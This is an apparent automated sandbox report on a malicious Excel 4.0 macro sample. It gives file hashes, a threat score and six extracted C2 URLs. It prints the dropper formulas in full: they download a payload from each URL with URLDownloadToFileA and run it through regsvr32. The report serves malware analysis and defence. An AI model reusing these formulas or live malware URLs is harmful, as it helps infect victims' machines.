General

  • Target

    0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

  • Size

    29KB

  • Sample

    241120-n3gfysxapl

  • MD5

    6800e99026c89a5f6d51fd3ca6f5fd53

  • SHA1

    6f423a2703dd49ec17bf300bf03e2c946edc29e5

  • SHA256

    0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

  • SHA512

    bd320e40b8988258e9547e28e8a640010b9aeaab8b930a8976b56af2379eae9c50c7df5b4a53d23550d85872e2c11ef0505b7abe4b782327ee9b55ec85fbc6e4

  • SSDEEP

    384:FDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:5PELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10

Malware Config

Extracted

  • Rule

    Excel 4.0 XLM Macro

  • C2

    http://janshabd.com/E33ZFv/

    http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

    http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/

    http://www.aacitygroup.com/mordacity/g29PQhuYA5x/

    http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/

    https://sse-studio.com/cq0xhpj/wdktmllfAYV/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0)
    =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0))
    =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0))
    =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0))
    =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0))
    =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0))
    =IF('OFJOV'!D21<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx")
    =RETURN()

Extracted

  • Language

    xlm4.0

  • Source / URLs

    xlm40.dropper: http://janshabd.com/E33ZFv/

    xlm40.dropper: http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
